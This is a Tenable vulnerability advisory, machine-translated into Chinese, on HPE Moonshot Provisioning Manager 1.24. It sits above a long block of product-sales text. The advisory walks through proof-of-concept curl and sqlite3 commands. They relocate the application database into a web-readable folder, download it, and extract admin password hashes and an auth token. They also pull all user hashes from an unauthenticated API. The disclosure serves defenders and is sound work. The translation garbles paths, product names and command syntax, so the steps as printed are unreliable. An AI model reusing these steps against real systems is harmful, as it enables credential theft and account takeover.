脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

(R1)多个HPE月球探测器Provisioning Manager漏洞

剧情简介

在开发一个Nessus插件cve - 2018 - 7072cve - 2018 - 7073的修复,站得住脚的发现HPE月球探测器Provisioning Manager v1.24 HPE咨询HPESBHF03843是不完整的。在v1.24,/ opt / hp /月球探测器/上传/和许多其他目录由用户仍可写的月球探测器:

#发现/ maxdepth 5类型d用户月球探测器烫/ u + w printf“% M % u % p \ n " 2 > / dev / null drwx——月球探测器/home/moonshot drwxr-xr-x月球探测器/var/lib/moonshot drwxr-xr-x月球探测器/ opt / hp /月球探测器drwxr-xr-x月球探测器/ opt / hp /月球探测器/包括drwxr-xr-x月球探测器/ opt / hp /月球探测器/回购drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ switch_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ prov_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/小叮当drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ moonshot_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ task_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/升级drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/根drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ os_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ user_mgr drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ pydeps drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ conf drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ tclient drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/ bin drwxr-xr-x月球探测器/ opt / hp /月球探测器/小叮当/答案drwxr-xr-x月球探测器/ opt / hp /月球探测器/上传drwxr-xr-x月球探测器/ opt / hp /月球探测器/ logs drwxr-xr-x月球探测器/ opt / hp /月球探测器/ bin drwxr-xr-x月球探测器/ opt / hp /月球探测器/ bin / __pycache__ drwxr-xr-x月球探测器/ opt / hp /月球探测器/ lib drwxr-xr-x月球探测器/ opt / hp /月球探测器/ lib / python3.3

例如,攻击者可以将db。sqlite3文件/var/lib/moonshot / opt / hp /月球探测器/上传/:

curl kd“isofile.savepath =美元/ var / lib /月球探测器/ db.sqlite3&isofile.filename = db。sqlite3“https:// < mpm_host > /目录/ khuploadfile。身体cgi < html > < > < p >文件上传成功< p > < /身体> < / html >

然后攻击者可以获取数据库。sqlite3文件:

curl - k - o db美元。sqlite3的https:// < mpm_host > /上传/ db。sqlite3的% % % Xferd收到总平均速度总花时间时间时间当前Dload上传速度100 95232 100 95232 0 0 294 k 0 -: -: - - - - -: -: - - - - -:—:, 567 k

db。sqlite3的数据库文件是“小叮当”Django项目,包含各种信息的web应用程序:https:// < mpm_host > /。例如,它包含有关配置用户信息和登录用户的身份验证令牌:

美元sqlite3 db。sqlite3 SQLite版本3.6.20输入”。帮助”的指令输入SQL语句终止”;“sqlite > .table auth_group moonshot_mgr_addressrecord auth_group_permissions moonshot_mgr_chassis auth_permission moonshot_mgr_chassisauthtoken auth_user moonshot_mgr_nic auth_user_groups moonshot_mgr_node auth_user_user_permissions moonshot_mgr_switch authtoken_token os_mgr_configurationfile django_admin_log os_mgr_operatingsystem django_content_type os_mgr_update django_migrations prov_mgr_backup django_session prov_mgr_clone djkombu_message prov_mgr_install djkombu_queue task_mgr_vlanassignmentrecord sqlite > .header sqlite > select * from auth_user;id密码| | is_superuser |用户名| first_name | last_name |电子邮件| is_staff | is_active | date_joined叫| last_login 1 | pbkdf2_sha256 gmAgQbL6t1YCbkw6qnl kTvcnCFdQyTE美元20000美元+ sGg9qKkf8wSQdxC + fhR4fwI = | 1 | user1 |用户数量1 | | | 1 | 1 | 2018-08-01 22:43:43.292870 | 2018-08-21 22:28:15.787135 2 | pbkdf2_sha256 eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc V0bHk71d7xte美元20000美元= | 1 | user2 |用户2号| | | 1 | 1 | 2018-08-21 22:47:59.549245 | sqlite > select * from authtoken_token;关键| |创建user_id e8419331029d8b4d24369cdab9a69b6d97bf3bf0 | 2018-08-21 22:27:23.451159 | 1

这些信息可以帮助攻击者发动进一步攻击。

另外,因为/var/lib/moonshot/db.sqlite3被转移到/ opt / hp /月球探测器/上传/不再有效,用户可以登录到web UI https:// < mpm_host > /。

与URL端点站不住脚还发现另一个安全问题/ / api /用户,它允许一个未经身份验证的远程攻击者获取所有用户帐户与敏感信息,包括密码散列:

curl - k美元的https:// < mpm_host > / api /用户/ [{“url”:“https: / < mpm_host > / < / api /用户/ 1 /”、“用户名”:“user1”、“first_name”:“用户第一”、“密码”:“pbkdf2_sha256 gmAgQbL6t1YCbkw6qnl kTvcnCFdQyTE美元20000美元+ sGg9qKkf8wSQdxC + fhR4fwI =”、“电子邮件”:“”、“is_staff”:真的,”is_active”:真的,”is_superuser”:真的,叫“last_login”:“2018 - 08 - 21 t22:28:15.787135z”、“date_joined”:“2018 - 08 - 01 t22:43:43.292870z”}, {:“url https://
               / api /用户/ 2 /”、“用户名”:“user2”、“first_name”:“用户2号”、“密码”:“pbkdf2_sha256 eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc V0bHk71d7xte美元20000美元=”、“电子邮件”:“”、“is_staff”:真的,”is_active”:真的,”is_superuser”:真的,叫“last_login”:空,“date_joined”:“2018 - 08 - 21 t22:47:59.549245z“})

解决方案

无解的存在。HPE联系进行进一步的指令。

披露时间表

08/23/2018——漏洞发现。
08/27/2018——HPE通过加密的电子邮件通知。2018年11月26日,90天的准备。
08/29/2018——HPE回应说他们很难解密邮件。问站得住脚的关键是使用。
08/29/2018——站得住脚的响应与关键id B75482FC3EFA7F7B PGP指纹5277 5632 C3B7 b1b ED1A D8F1 B754 82 fc 3脂肪酸7 f7b。
08/30/2018——站得住脚的问HPE能够解密披露。
08/30/2018——HPE确认他们能够。问的为什么他们认为发展可能未能正确的补丁。
08/30/2018——站得住脚的提供反馈。
10/12/2018——站得住脚的要求更新。
10/23/2018——站得住脚的要求更新。
11/15/2018——站得住脚的要求更新。
11/26/2018——站得住脚的通知HPE咨询发布。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2018 - 39
CVSSv2基地/时间的分数
7.5/6.8
CVSSv2向量
AV: N /交流:L /非盟:N / C: P / I: P / A: P
受影响的产品
HPE月球探测器Provisioning Manager 1.24
风险因素

咨询时间

11/26/2018——(R1)最初版本

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map